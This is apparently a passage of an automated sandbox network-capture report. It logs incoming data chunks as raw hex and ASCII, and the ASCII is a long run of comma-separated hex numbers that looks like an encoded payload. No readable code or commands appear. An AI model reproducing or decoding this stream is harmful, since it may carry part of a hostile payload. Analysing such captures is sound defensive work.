2023-03-24 06:58:02 UTC	240	IN	Data Raw: 2c 39 36 2c 63 34 2c 31 31 65 2c 31 32 61 2c 38 39 2c 39 63 2c 31 30 35 2c 31 30 64 2c 38 31 2c 31 33 33 2c 64 38 2c 38 36 2c 37 33 2c 38 35 2c 39 35 2c 39 66 2c 31 32 33 2c 31 31 30 2c 31 32 36 2c 38 37 2c 66 33 2c 61 31 2c 37 61 2c 62 61 2c 64 66 2c 65 39 2c 38 33 2c 31 31 33 2c 39 38 2c 31 35 32 2c 37 31 2c 61 65 2c 65 31 2c 62 35 2c 31 36 31 2c 61 37 2c 34 63 2c 64 39 2c 31 31 34 2c 38 36 2c 35 61 2c 62 34 2c 37 30 2c 31 30 63 2c 61 30 2c 36 33 2c 31 33 33 2c 31 32 36 2c 38 30 2c 38 64 2c 31 33 38 2c 39 61 2c 65 62 2c 31 31 34 2c 39 36 2c 63 62 2c 35 63 2c 39 33 2c 64 38 2c 62 32 2c 34 34 2c 31 33 36 2c 31 34 30 2c 31 32 39 2c 37 63 2c 62 30 2c 37 63 2c 35 66 2c 37 64 2c 62 64 2c 39 39 2c 36 65 2c 31 31 38 2c 31 34 64 2c 62 30 2c 36 63 2c 61 30 2c 36 Data Ascii: ,96,c4,11e,12a,89,9c,105,10d,81,133,d8,86,73,85,95,9f,123,110,126,87,f3,a1,7a,ba,df,e9,83,113,98,152,71,ae,e1,b5,161,a7,4c,d9,114,86,5a,b4,70,10c,a0,63,133,126,80,8d,138,9a,eb,114,96,cb,5c,93,d8,b2,44,136,140,129,7c,b0,7c,5f,7d,bd,99,6e,118,14d,b0,6c,a0,6
2023-03-24 06:58:02 UTC	256	IN	Data Raw: 62 2c 62 66 2c 65 38 2c 31 32 33 2c 61 30 2c 31 31 34 2c 65 31 2c 31 33 30 2c 33 37 2c 39 38 2c 38 37 2c 31 36 39 2c 31 32 30 2c 37 38 2c 37 65 2c 31 30 65 2c 61 38 2c 35 63 2c 31 30 32 2c 63 36 2c 38 39 2c 64 36 2c 66 61 2c 36 33 2c 31 33 34 2c 31 30 34 2c 39 37 2c 31 33 36 2c 39 63 2c 39 66 2c 61 30 2c 66 64 2c 31 31 32 2c 66 39 2c 63 32 2c 31 33 30 2c 64 38 2c 39 64 2c 31 35 37 2c 61 31 2c 33 65 2c 36 33 2c 35 64 2c 37 61 2c 36 35 2c 39 33 2c 36 32 2c 31 34 34 2c 34 63 2c 35 37 2c 39 37 2c 31 30 31 2c 38 63 2c 31 30 65 2c 62 32 2c 35 36 2c 37 62 2c 31 30 34 2c 39 39 2c 31 30 65 2c 31 33 35 2c 38 38 2c 38 64 2c 31 31 63 2c 62 35 2c 63 33 2c 64 33 2c 31 34 34 2c 62 34 2c 33 37 2c 63 61 2c 66 63 2c 36 63 2c 66 31 2c 37 35 2c 65 65 2c 31 33 63 2c 35 37 2c Data Ascii: b,bf,e8,123,a0,114,e1,130,37,98,87,169,120,78,7e,10e,a8,5c,102,c6,89,d6,fa,63,134,104,97,136,9c,9f,a0,fd,112,f9,c2,130,d8,9d,157,a1,3e,63,5d,7a,65,93,62,144,4c,57,97,101,8c,10e,b2,56,7b,104,99,10e,135,88,8d,11c,b5,c3,d3,144,b4,37,ca,fc,6c,f1,75,ee,13c,57,
2023-03-24 06:58:02 UTC	272	IN	Data Raw: 65 32 2c 38 38 2c 39 39 2c 37 37 2c 31 32 65 2c 31 30 34 2c 31 35 31 2c 65 61 2c 31 34 62 2c 37 35 2c 31 34 36 2c 31 31 64 2c 31 30 35 2c 31 32 66 2c 63 38 2c 31 30 35 2c 35 62 2c 37 64 2c 31 30 64 2c 64 33 2c 31 32 64 2c 61 66 2c 31 31 31 2c 65 32 2c 36 38 2c 38 32 2c 35 36 2c 63 34 2c 31 34 39 2c 31 30 61 2c 65 63 2c 31 35 33 2c 31 30 38 2c 35 38 2c 63 34 2c 38 39 2c 38 32 2c 64 31 2c 37 64 2c 64 37 2c 31 36 34 2c 38 33 2c 62 37 2c 36 39 2c 31 31 63 2c 39 62 2c 64 32 2c 65 30 2c 66 37 2c 61 33 2c 61 61 2c 63 38 2c 34 61 2c 65 66 2c 31 34 39 2c 65 35 2c 31 35 64 2c 66 38 2c 36 39 2c 63 65 2c 39 30 2c 31 35 64 2c 31 34 32 2c 65 30 2c 66 39 2c 31 30 66 2c 62 30 2c 35 66 2c 31 30 65 2c 63 34 2c 66 66 2c 66 33 2c 31 33 31 2c 31 31 37 2c 38 32 2c 64 34 2c 62 Data Ascii: e2,88,99,77,12e,104,151,ea,14b,75,146,11d,105,12f,c8,105,5b,7d,10d,d3,12d,af,111,e2,68,82,56,c4,149,10a,ec,153,108,58,c4,89,82,d1,7d,d7,164,83,b7,69,11c,9b,d2,e0,f7,a3,aa,c8,4a,ef,149,e5,15d,f8,69,ce,90,15d,142,e0,f9,10f,b0,5f,10e,c4,ff,f3,131,117,82,d4,b
2023-03-24 06:58:02 UTC	288	IN	Data Raw: 2c 61 39 2c 36 36 2c 31 36 35 2c 31 35 36 2c 66 62 2c 31 32 62 2c 31 31 36 2c 31 31 30 2c 31 34 64 2c 65 30 2c 31 31 62 2c 31 36 39 2c 62 37 2c 39 39 2c 37 66 2c 36 38 2c 31 30 39 2c 64 35 2c 31 31 65 2c 31 32 63 2c 62 30 2c 61 36 2c 31 32 37 2c 65 66 2c 38 35 2c 61 36 2c 33 63 2c 31 31 37 2c 39 61 2c 31 32 34 2c 65 62 2c 36 39 2c 64 38 2c 61 65 2c 31 35 37 2c 31 35 39 2c 66 39 2c 37 36 2c 38 33 2c 63 31 2c 64 38 2c 31 31 38 2c 34 61 2c 62 64 2c 38 36 2c 62 32 2c 31 30 38 2c 66 35 2c 65 66 2c 62 65 2c 63 62 2c 31 33 64 2c 31 32 61 2c 31 32 64 2c 31 32 64 2c 61 37 2c 37 65 2c 64 64 2c 64 39 2c 61 36 2c 31 31 37 2c 31 34 31 2c 31 34 63 2c 64 38 2c 31 33 30 2c 39 33 2c 66 33 2c 61 62 2c 61 38 2c 31 33 31 2c 36 65 2c 31 31 31 2c 66 64 2c 31 32 65 2c 31 31 31 Data Ascii: ,a9,66,165,156,fb,12b,116,110,14d,e0,11b,169,b7,99,7f,68,109,d5,11e,12c,b0,a6,127,ef,85,a6,3c,117,9a,124,eb,69,d8,ae,157,159,f9,76,83,c1,d8,118,4a,bd,86,b2,108,f5,ef,be,cb,13d,12a,12d,12d,a7,7e,dd,d9,a6,117,141,14c,d8,130,93,f3,ab,a8,131,6e,111,fd,12e,111
2023-03-24 06:58:02 UTC	304	IN	Data Raw: 37 2c 62 64 2c 61 65 2c 61 31 2c 61 37 2c 31 32 64 2c 61 31 2c 31 31 66 2c 66 61 2c 64 65 2c 65 61 2c 34 61 2c 62 62 2c 31 34 32 2c 36 32 2c 62 39 2c 31 34 63 2c 39 32 2c 31 34 66 2c 38 64 2c 31 35 63 2c 64 65 2c 65 64 2c 39 64 2c 31 31 63 2c 31 32 31 2c 31 34 38 2c 66 65 2c 35 36 2c 31 34 64 2c 33 63 2c 63 62 2c 63 32 2c 31 33 66 2c 63 32 2c 39 35 2c 63 32 2c 35 61 2c 37 63 2c 39 37 2c 31 36 39 2c 36 33 2c 31 32 33 2c 66 34 2c 39 62 2c 31 33 34 2c 61 61 2c 36 37 2c 65 32 2c 31 32 63 2c 65 37 2c 63 30 2c 38 62 2c 37 37 2c 33 65 2c 66 33 2c 31 32 39 2c 38 61 2c 31 35 34 2c 62 35 2c 64 33 2c 38 34 2c 39 35 2c 39 33 2c 38 33 2c 64 61 2c 31 35 32 2c 64 35 2c 65 36 2c 36 36 2c 31 33 32 2c 38 30 2c 31 32 35 2c 31 31 35 2c 39 36 2c 64 65 2c 38 65 2c 37 66 2c 64 Data Ascii: 7,bd,ae,a1,a7,12d,a1,11f,fa,de,ea,4a,bb,142,62,b9,14c,92,14f,8d,15c,de,ed,9d,11c,121,148,fe,56,14d,3c,cb,c2,13f,c2,95,c2,5a,7c,97,169,63,123,f4,9b,134,aa,67,e2,12c,e7,c0,8b,77,3e,f3,129,8a,154,b5,d3,84,95,93,83,da,152,d5,e6,66,132,80,125,115,96,de,8e,7f,d
2023-03-24 06:58:02 UTC	320	IN	Data Raw: 32 2c 65 32 2c 37 65 2c 31 31 63 2c 62 36 2c 31 31 66 2c 31 30 65 2c 62 37 2c 31 30 34 2c 38 37 2c 63 39 2c 37 38 2c 31 34 35 2c 35 65 2c 31 31 61 2c 66 34 2c 39 37 2c 35 64 2c 31 33 33 2c 64 65 2c 63 30 2c 64 62 2c 61 36 2c 31 35 30 2c 63 36 2c 31 30 66 2c 39 33 2c 65 33 2c 61 35 2c 31 32 66 2c 35 37 2c 64 65 2c 35 61 2c 38 31 2c 63 64 2c 31 35 36 2c 62 61 2c 31 34 64 2c 64 66 2c 31 34 66 2c 31 34 37 2c 61 62 2c 31 31 39 2c 31 30 31 2c 36 33 2c 31 32 63 2c 66 36 2c 31 34 35 2c 65 35 2c 31 34 62 2c 31 31 33 2c 31 33 39 2c 31 35 32 2c 33 64 2c 39 35 2c 38 30 2c 37 65 2c 66 31 2c 31 34 36 2c 31 35 64 2c 65 62 2c 37 62 2c 37 38 2c 39 63 2c 66 65 2c 39 38 2c 66 63 2c 31 30 61 2c 64 31 2c 61 66 2c 31 33 35 2c 61 31 2c 38 37 2c 31 30 64 2c 39 33 2c 36 31 2c 31 Data Ascii: 2,e2,7e,11c,b6,11f,10e,b7,104,87,c9,78,145,5e,11a,f4,97,5d,133,de,c0,db,a6,150,c6,10f,93,e3,a5,12f,57,de,5a,81,cd,156,ba,14d,df,14f,147,ab,119,101,63,12c,f6,145,e5,14b,113,139,152,3d,95,80,7e,f1,146,15d,eb,7b,78,9c,fe,98,fc,10a,d1,af,135,a1,87,10d,93,61,1
2023-03-24 06:58:02 UTC	336	IN	Data Raw: 2c 66 30 2c 31 31 31 2c 36 63 2c 38 61 2c 39 66 2c 64 32 2c 31 36 33 2c 31 30 37 2c 65 38 2c 62 36 2c 31 33 35 2c 38 34 2c 63 61 2c 39 33 2c 31 30 31 2c 66 36 2c 31 34 35 2c 38 66 2c 37 66 2c 31 31 30 2c 31 31 36 2c 39 63 2c 31 30 32 2c 31 31 36 2c 38 65 2c 65 37 2c 31 30 35 2c 66 61 2c 62 66 2c 61 30 2c 38 30 2c 61 65 2c 65 36 2c 66 66 2c 31 33 66 2c 31 33 36 2c 31 30 66 2c 64 38 2c 31 31 64 2c 31 31 31 2c 65 62 2c 66 34 2c 31 31 39 2c 31 31 35 2c 35 66 2c 64 62 2c 31 30 66 2c 31 34 38 2c 31 32 62 2c 36 33 2c 61 30 2c 34 30 2c 62 32 2c 66 61 2c 38 38 2c 66 35 2c 66 62 2c 34 39 2c 31 33 36 2c 31 31 30 2c 39 64 2c 62 63 2c 31 34 65 2c 63 39 2c 31 31 62 2c 35 62 2c 38 66 2c 64 36 2c 36 37 2c 65 31 2c 61 64 2c 31 31 33 2c 33 37 2c 61 66 2c 63 39 2c 33 38 2c Data Ascii: ,f0,111,6c,8a,9f,d2,163,107,e8,b6,135,84,ca,93,101,f6,145,8f,7f,110,116,9c,102,116,8e,e7,105,fa,bf,a0,80,ae,e6,ff,13f,136,10f,d8,11d,111,eb,f4,119,115,5f,db,10f,148,12b,63,a0,40,b2,fa,88,f5,fb,49,136,110,9d,bc,14e,c9,11b,5b,8f,d6,67,e1,ad,113,37,af,c9,38,
2023-03-24 06:58:02 UTC	352	IN	Data Raw: 31 31 39 2c 63 36 2c 66 30 2c 64 30 2c 65 38 2c 63 38 2c 31 31 64 2c 36 32 2c 64 37 2c 31 33 37 2c 61 38 2c 39 62 2c 31 33 66 2c 65 33 2c 61 37 2c 66 36 2c 66 35 2c 66 33 2c 39 39 2c 64 38 2c 65 61 2c 36 66 2c 31 31 31 2c 31 36 39 2c 63 63 2c 31 31 34 2c 61 33 2c 31 33 31 2c 66 31 2c 31 33 33 2c 31 30 64 2c 31 30 64 2c 65 61 2c 31 33 31 2c 36 34 2c 66 30 2c 62 36 2c 61 61 2c 61 30 2c 31 31 65 2c 31 33 30 2c 31 31 37 2c 31 32 62 2c 63 63 2c 39 36 2c 31 34 37 2c 31 31 32 2c 39 64 2c 66 62 2c 31 32 35 2c 35 63 2c 31 37 36 2c 65 30 2c 65 34 2c 65 65 2c 61 37 2c 38 34 2c 34 38 2c 31 34 36 2c 64 34 2c 65 63 2c 39 38 2c 64 62 2c 62 61 2c 38 38 2c 38 63 2c 65 61 2c 62 30 2c 63 66 2c 38 64 2c 38 64 2c 36 31 2c 38 35 2c 36 37 2c 31 31 64 2c 31 33 65 2c 38 66 2c 38 Data Ascii: 119,c6,f0,d0,e8,c8,11d,62,d7,137,a8,9b,13f,e3,a7,f6,f5,f3,99,d8,ea,6f,111,169,cc,114,a3,131,f1,133,10d,10d,ea,131,64,f0,b6,aa,a0,11e,130,117,12b,cc,96,147,112,9d,fb,125,5c,176,e0,e4,ee,a7,84,48,146,d4,ec,98,db,ba,88,8c,ea,b0,cf,8d,8d,61,85,67,11d,13e,8f,8
2023-03-24 06:58:02 UTC	368	IN	Data Raw: 39 2c 62 34 2c 39 39 2c 37 62 2c 62 32 2c 64 66 2c 31 32 38 2c 63 39 2c 31 33 35 2c 39 36 2c 62 30 2c 31 33 36 2c 31 31 33 2c 66 33 2c 31 32 36 2c 31 30 64 2c 66 61 2c 65 65 2c 62 65 2c 31 32 30 2c 38 31 2c 63 64 2c 63 66 2c 39 64 2c 61 65 2c 61 61 2c 31 32 61 2c 62 64 2c 31 30 31 2c 38 31 2c 31 31 34 2c 39 36 2c 62 31 2c 38 66 2c 64 39 2c 63 32 2c 31 32 34 2c 31 34 65 2c 34 32 2c 31 33 34 2c 65 62 2c 31 33 62 2c 65 30 2c 31 34 34 2c 38 33 2c 64 64 2c 32 65 2c 62 63 2c 31 30 65 2c 31 30 62 2c 31 35 38 2c 31 35 61 2c 31 33 37 2c 38 36 2c 39 39 2c 31 33 66 2c 31 32 30 2c 62 66 2c 64 35 2c 31 31 39 2c 36 63 2c 65 31 2c 38 31 2c 38 38 2c 64 62 2c 39 63 2c 31 30 63 2c 31 31 62 2c 64 64 2c 38 34 2c 36 38 2c 65 37 2c 31 35 36 2c 31 35 31 2c 61 61 2c 35 39 2c 64 Data Ascii: 9,b4,99,7b,b2,df,128,c9,135,96,b0,136,113,f3,126,10d,fa,ee,be,120,81,cd,cf,9d,ae,aa,12a,bd,101,81,114,96,b1,8f,d9,c2,124,14e,42,134,eb,13b,e0,144,83,dd,2e,bc,10e,10b,158,15a,137,86,99,13f,120,bf,d5,119,6c,e1,81,88,db,9c,10c,11b,dd,84,68,e7,156,151,aa,59,d
2023-03-24 06:58:02 UTC	384	IN	Data Raw: 33 63 2c 31 32 66 2c 31 32 36 2c 63 65 2c 36 62 2c 62 35 2c 39 62 2c 31 30 34 2c 31 34 34 2c 34 62 2c 31 30 30 2c 63 62 2c 66 39 2c 35 31 2c 31 34 66 2c 31 35 34 2c 31 30 63 2c 65 32 2c 39 30 2c 66 37 2c 33 64 2c 63 32 2c 38 35 2c 31 32 37 2c 65 38 2c 64 36 2c 63 39 2c 31 30 32 2c 31 33 37 2c 31 32 66 2c 31 31 63 2c 31 32 30 2c 31 32 32 2c 39 33 2c 33 65 2c 62 65 2c 31 31 63 2c 38 66 2c 39 33 2c 65 62 2c 31 33 35 2c 34 32 2c 31 35 61 2c 31 32 39 2c 34 30 2c 31 33 62 2c 31 30 35 2c 61 62 2c 39 35 2c 31 31 61 2c 61 38 2c 31 31 62 2c 62 65 2c 38 38 2c 31 32 65 2c 31 35 35 2c 66 30 2c 63 31 2c 65 34 2c 31 33 32 2c 36 35 2c 61 32 2c 31 34 34 2c 31 34 66 2c 63 36 2c 36 39 2c 64 33 2c 65 66 2c 64 38 2c 39 36 2c 65 64 2c 65 37 2c 39 30 2c 31 30 38 2c 65 39 2c 61 Data Ascii: 3c,12f,126,ce,6b,b5,9b,104,144,4b,100,cb,f9,51,14f,154,10c,e2,90,f7,3d,c2,85,127,e8,d6,c9,102,137,12f,11c,120,122,93,3e,be,11c,8f,93,eb,135,42,15a,129,40,13b,105,ab,95,11a,a8,11b,be,88,12e,155,f0,c1,e4,132,65,a2,144,14f,c6,69,d3,ef,d8,96,ed,e7,90,108,e9,a
2023-03-24 06:58:02 UTC	400	IN	Data Raw: 65 2c 31 34 33 2c 38 65 2c 65 38 2c 65 65 2c 34 37 2c 38 39 2c 31 34 66 2c 31 32 38 2c 31 31 65 2c 66 34 2c 61 38 2c 39 65 2c 39 64 2c 31 34 65 2c 31 36 34 2c 66 33 2c 31 32 34 2c 35 32 2c 38 32 2c 65 32 2c 31 31 64 2c 31 33 61 2c 62 30 2c 31 30 31 2c 62 61 2c 31 31 32 2c 37 63 2c 61 32 2c 38 35 2c 31 34 61 2c 62 39 2c 64 31 2c 31 31 36 2c 31 31 32 2c 63 65 2c 63 31 2c 61 62 2c 66 33 2c 31 30 36 2c 37 61 2c 39 38 2c 63 36 2c 31 30 65 2c 35 39 2c 37 61 2c 31 36 35 2c 31 31 32 2c 61 39 2c 31 32 61 2c 36 62 2c 36 37 2c 38 34 2c 35 38 2c 36 61 2c 31 30 34 2c 62 34 2c 31 35 61 2c 36 62 2c 61 61 2c 31 31 65 2c 31 31 35 2c 37 33 2c 38 64 2c 63 64 2c 31 31 31 2c 63 64 2c 31 30 33 2c 63 32 2c 62 38 2c 64 37 2c 65 65 2c 31 35 38 2c 66 37 2c 31 33 34 2c 65 37 2c 31 Data Ascii: e,143,8e,e8,ee,47,89,14f,128,11e,f4,a8,9e,9d,14e,164,f3,124,52,82,e2,11d,13a,b0,101,ba,112,7c,a2,85,14a,b9,d1,116,112,ce,c1,ab,f3,106,7a,98,c6,10e,59,7a,165,112,a9,12a,6b,67,84,58,6a,104,b4,15a,6b,aa,11e,115,73,8d,cd,111,cd,103,c2,b8,d7,ee,158,f7,134,e7,1
2023-03-24 06:58:02 UTC	416	IN	Data Raw: 2c 31 33 32 2c 31 35 64 2c 31 34 39 2c 39 36 2c 35 33 2c 66 31 2c 65 66 2c 34 65 2c 65 66 2c 31 32 30 2c 31 36 63 2c 61 35 2c 31 30 38 2c 64 34 2c 65 35 2c 31 33 36 2c 62 31 2c 31 32 61 2c 62 37 2c 31 35 36 2c 61 35 2c 61 61 2c 39 31 2c 62 35 2c 31 35 62 2c 63 61 2c 31 33 30 2c 35 38 2c 35 64 2c 31 30 36 2c 31 32 66 2c 34 32 2c 65 39 2c 62 37 2c 65 32 2c 31 35 62 2c 34 36 2c 31 35 31 2c 38 35 2c 62 35 2c 31 32 66 2c 62 38 2c 37 65 2c 63 62 2c 39 35 2c 66 35 2c 61 61 2c 62 61 2c 35 31 2c 38 64 2c 39 61 2c 31 35 32 2c 64 31 2c 31 30 36 2c 38 66 2c 62 61 2c 66 38 2c 31 37 35 2c 31 35 32 2c 65 35 2c 34 64 2c 31 31 36 2c 61 33 2c 64 38 2c 31 32 35 2c 31 32 32 2c 31 33 37 2c 38 65 2c 65 30 2c 31 36 32 2c 31 33 64 2c 31 31 32 2c 39 34 2c 31 30 61 2c 31 31 31 2c Data Ascii: ,132,15d,149,96,53,f1,ef,4e,ef,120,16c,a5,108,d4,e5,136,b1,12a,b7,156,a5,aa,91,b5,15b,ca,130,58,5d,106,12f,42,e9,b7,e2,15b,46,151,85,b5,12f,b8,7e,cb,95,f5,aa,ba,51,8d,9a,152,d1,106,8f,ba,f8,175,152,e5,4d,116,a3,d8,125,122,137,8e,e0,162,13d,112,94,10a,111,
2023-03-24 06:58:02 UTC	432	IN	Data Raw: 31 2c 62 61 2c 31 34 66 2c 31 33 63 2c 62 66 2c 38 39 2c 62 39 2c 39 37 2c 31 32 65 2c 31 30 33 2c 37 36 2c 62 35 2c 64 33 2c 31 31 31 2c 64 39 2c 31 35 32 2c 31 34 38 2c 31 34 62 2c 61 36 2c 39 39 2c 37 33 2c 31 37 30 2c 31 35 31 2c 31 35 33 2c 31 33 62 2c 36 62 2c 64 30 2c 31 31 38 2c 31 30 36 2c 35 61 2c 65 36 2c 62 33 2c 62 31 2c 39 65 2c 62 30 2c 65 31 2c 38 39 2c 31 30 31 2c 31 31 36 2c 31 35 31 2c 61 37 2c 61 30 2c 61 33 2c 31 30 30 2c 37 64 2c 31 30 66 2c 37 32 2c 37 30 2c 31 36 36 2c 36 64 2c 64 31 2c 31 30 65 2c 64 61 2c 31 31 30 2c 39 65 2c 37 38 2c 65 39 2c 64 39 2c 33 61 2c 63 31 2c 31 32 63 2c 63 63 2c 31 37 31 2c 64 37 2c 31 30 33 2c 66 34 2c 62 63 2c 39 34 2c 61 39 2c 63 35 2c 35 35 2c 31 32 66 2c 31 30 64 2c 31 30 66 2c 33 36 2c 62 39 2c Data Ascii: 1,ba,14f,13c,bf,89,b9,97,12e,103,76,b5,d3,111,d9,152,148,14b,a6,99,73,170,151,153,13b,6b,d0,118,106,5a,e6,b3,b1,9e,b0,e1,89,101,116,151,a7,a0,a3,100,7d,10f,72,70,166,6d,d1,10e,da,110,9e,78,e9,d9,3a,c1,12c,cc,171,d7,103,f4,bc,94,a9,c5,55,12f,10d,10f,36,b9,
2023-03-24 06:58:02 UTC	448	IN	Data Raw: 31 35 66 2c 63 39 2c 38 36 2c 66 37 2c 62 34 2c 63 61 2c 35 64 2c 34 37 2c 63 30 2c 62 32 2c 64 39 2c 63 65 2c 31 30 64 2c 65 62 2c 64 64 2c 33 30 2c 38 62 2c 38 63 2c 31 37 30 2c 64 31 2c 34 64 2c 34 31 2c 31 35 64 2c 33 64 2c 66 36 2c 31 30 64 2c 31 32 35 2c 31 33 31 2c 38 36 2c 61 39 2c 37 65 2c 62 64 2c 31 32 64 2c 31 32 63 2c 62 34 2c 63 62 2c 31 34 31 2c 66 35 2c 65 33 2c 37 36 2c 65 37 2c 31 37 31 2c 31 33 33 2c 31 32 30 2c 31 30 66 2c 31 30 62 2c 36 65 2c 64 36 2c 31 32 64 2c 31 31 36 2c 64 38 2c 31 31 37 2c 31 33 30 2c 31 32 38 2c 39 35 2c 64 39 2c 39 65 2c 31 30 33 2c 36 35 2c 31 30 62 2c 62 63 2c 62 64 2c 31 33 34 2c 31 33 63 2c 31 31 38 2c 31 35 37 2c 31 33 34 2c 66 34 2c 63 32 2c 35 31 2c 65 34 2c 31 33 30 2c 31 33 31 2c 39 30 2c 31 33 32 2c Data Ascii: 15f,c9,86,f7,b4,ca,5d,47,c0,b2,d9,ce,10d,eb,dd,30,8b,8c,170,d1,4d,41,15d,3d,f6,10d,125,131,86,a9,7e,bd,12d,12c,b4,cb,141,f5,e3,76,e7,171,133,120,10f,10b,6e,d6,12d,116,d8,117,130,128,95,d9,9e,103,65,10b,bc,bd,134,13c,118,157,134,f4,c2,51,e4,130,131,90,132,
2023-03-24 06:58:02 UTC	464	IN	Data Raw: 2c 38 37 2c 37 31 2c 61 39 2c 36 63 2c 38 36 2c 62 30 2c 65 64 2c 31 32 36 2c 62 61 2c 31 34 63 2c 66 31 2c 63 33 2c 61 37 2c 34 66 2c 34 66 2c 31 36 36 2c 65 33 2c 62 35 2c 61 32 2c 31 35 62 2c 63 62 2c 61 33 2c 65 37 2c 63 39 2c 39 64 2c 66 61 2c 31 31 31 2c 35 66 2c 38 65 2c 34 63 2c 62 61 2c 66 65 2c 31 30 35 2c 63 66 2c 31 32 62 2c 31 31 37 2c 38 30 2c 62 31 2c 38 34 2c 63 33 2c 62 33 2c 31 31 34 2c 31 33 30 2c 31 33 64 2c 62 64 2c 63 32 2c 63 34 2c 64 66 2c 61 64 2c 36 36 2c 38 34 2c 31 30 65 2c 66 66 2c 66 32 2c 38 36 2c 66 32 2c 61 33 2c 38 37 2c 31 33 64 2c 37 37 2c 31 31 66 2c 35 30 2c 61 35 2c 64 36 2c 63 61 2c 31 30 64 2c 61 32 2c 38 36 2c 37 34 2c 63 38 2c 62 32 2c 31 30 34 2c 39 62 2c 62 31 2c 61 36 2c 31 33 34 2c 39 65 2c 61 63 2c 31 32 34 Data Ascii: ,87,71,a9,6c,86,b0,ed,126,ba,14c,f1,c3,a7,4f,4f,166,e3,b5,a2,15b,cb,a3,e7,c9,9d,fa,111,5f,8e,4c,ba,fe,105,cf,12b,117,80,b1,84,c3,b3,114,130,13d,bd,c2,c4,df,ad,66,84,10e,ff,f2,86,f2,a3,87,13d,77,11f,50,a5,d6,ca,10d,a2,86,74,c8,b2,104,9b,b1,a6,134,9e,ac,124
2023-03-24 06:58:02 UTC	480	IN	Data Raw: 2c 38 64 2c 31 32 38 2c 31 34 32 2c 64 35 2c 31 33 62 2c 36 65 2c 36 35 2c 65 39 2c 39 61 2c 36 64 2c 31 30 38 2c 65 38 2c 66 39 2c 63 61 2c 31 31 37 2c 36 38 2c 63 35 2c 31 33 31 2c 61 37 2c 38 62 2c 31 31 33 2c 66 61 2c 66 38 2c 31 30 66 2c 36 32 2c 31 35 32 2c 39 31 2c 34 30 2c 38 36 2c 64 64 2c 31 35 39 2c 31 34 65 2c 63 64 2c 31 30 34 2c 64 31 2c 61 64 2c 37 33 2c 61 34 2c 31 32 61 2c 64 61 2c 31 33 34 2c 31 32 63 2c 37 31 2c 65 63 2c 62 62 2c 33 36 2c 31 34 35 2c 61 65 2c 31 36 61 2c 31 32 64 2c 62 30 2c 61 39 2c 38 33 2c 31 32 36 2c 65 37 2c 31 30 38 2c 31 32 39 2c 31 34 66 2c 39 37 2c 33 66 2c 62 39 2c 31 35 30 2c 66 31 2c 64 37 2c 37 37 2c 31 34 35 2c 31 30 32 2c 62 62 2c 64 34 2c 39 37 2c 62 34 2c 31 33 39 2c 38 35 2c 31 34 66 2c 65 35 2c 31 35 Data Ascii: ,8d,128,142,d5,13b,6e,65,e9,9a,6d,108,e8,f9,ca,117,68,c5,131,a7,8b,113,fa,f8,10f,62,152,91,40,86,dd,159,14e,cd,104,d1,ad,73,a4,12a,da,134,12c,71,ec,bb,36,145,ae,16a,12d,b0,a9,83,126,e7,108,129,14f,97,3f,b9,150,f1,d7,77,145,102,bb,d4,97,b4,139,85,14f,e5,15
2023-03-24 06:58:02 UTC	496	IN	Data Raw: 2c 31 32 66 2c 31 34 31 2c 31 34 37 2c 39 31 2c 66 34 2c 39 64 2c 31 32 35 2c 39 35 2c 31 33 66 2c 31 33 32 2c 65 62 2c 31 33 33 2c 37 38 2c 37 65 2c 31 30 62 2c 62 32 2c 62 31 2c 31 35 66 2c 37 35 2c 31 35 30 2c 65 32 2c 64 63 2c 39 34 2c 62 31 2c 66 31 2c 63 32 2c 39 35 2c 63 61 2c 34 31 2c 39 36 2c 36 65 2c 38 32 2c 38 64 2c 62 65 2c 31 31 35 2c 31 32 30 2c 31 32 65 2c 39 66 2c 39 65 2c 61 38 2c 66 35 2c 31 34 66 2c 66 32 2c 31 32 65 2c 31 32 32 2c 31 31 39 2c 65 64 2c 65 34 2c 38 65 2c 31 35 37 2c 65 61 2c 31 31 31 2c 63 36 2c 31 34 38 2c 62 39 2c 31 35 61 2c 31 31 32 2c 66 33 2c 31 31 32 2c 61 30 2c 37 39 2c 39 37 2c 65 63 2c 62 38 2c 65 31 2c 38 63 2c 36 66 2c 62 33 2c 63 62 2c 31 36 34 2c 35 30 2c 62 36 2c 31 32 38 2c 31 35 30 2c 31 31 37 2c 31 30 Data Ascii: ,12f,141,147,91,f4,9d,125,95,13f,132,eb,133,78,7e,10b,b2,b1,15f,75,150,e2,dc,94,b1,f1,c2,95,ca,41,96,6e,82,8d,be,115,120,12e,9f,9e,a8,f5,14f,f2,12e,122,119,ed,e4,8e,157,ea,111,c6,148,b9,15a,112,f3,112,a0,79,97,ec,b8,e1,8c,6f,b3,cb,164,50,b6,128,150,117,10
2023-03-24 06:58:02 UTC	512	IN	Data Raw: 2c 31 33 65 2c 31 36 65 2c 31 31 66 2c 31 35 34 2c 31 32 34 2c 31 31 38 2c 61 65 2c 39 32 2c 36 65 2c 31 33 30 2c 31 30 38 2c 66 61 2c 36 65 2c 31 32 32 2c 31 32 62 2c 64 31 2c 64 62 2c 64 66 2c 36 38 2c 31 34 61 2c 61 63 2c 31 31 31 2c 65 37 2c 66 39 2c 34 38 2c 36 64 2c 61 64 2c 36 35 2c 31 31 32 2c 38 36 2c 37 32 2c 39 65 2c 39 65 2c 38 39 2c 38 30 2c 37 30 2c 61 65 2c 38 66 2c 66 32 2c 36 31 2c 39 63 2c 65 36 2c 31 31 64 2c 39 65 2c 39 33 2c 64 31 2c 31 31 38 2c 31 33 39 2c 31 31 34 2c 38 62 2c 35 34 2c 31 33 63 2c 66 63 2c 31 33 64 2c 61 33 2c 62 30 2c 63 32 2c 31 32 65 2c 31 32 63 2c 31 33 35 2c 66 62 2c 65 32 2c 38 37 2c 31 31 39 2c 64 31 2c 38 63 2c 31 33 63 2c 38 34 2c 63 36 2c 31 31 31 2c 62 39 2c 64 65 2c 37 63 2c 63 65 2c 62 36 2c 31 31 66 2c Data Ascii: ,13e,16e,11f,154,124,118,ae,92,6e,130,108,fa,6e,122,12b,d1,db,df,68,14a,ac,111,e7,f9,48,6d,ad,65,112,86,72,9e,9e,89,80,70,ae,8f,f2,61,9c,e6,11d,9e,93,d1,118,139,114,8b,54,13c,fc,13d,a3,b0,c2,12e,12c,135,fb,e2,87,119,d1,8c,13c,84,c6,111,b9,de,7c,ce,b6,11f,
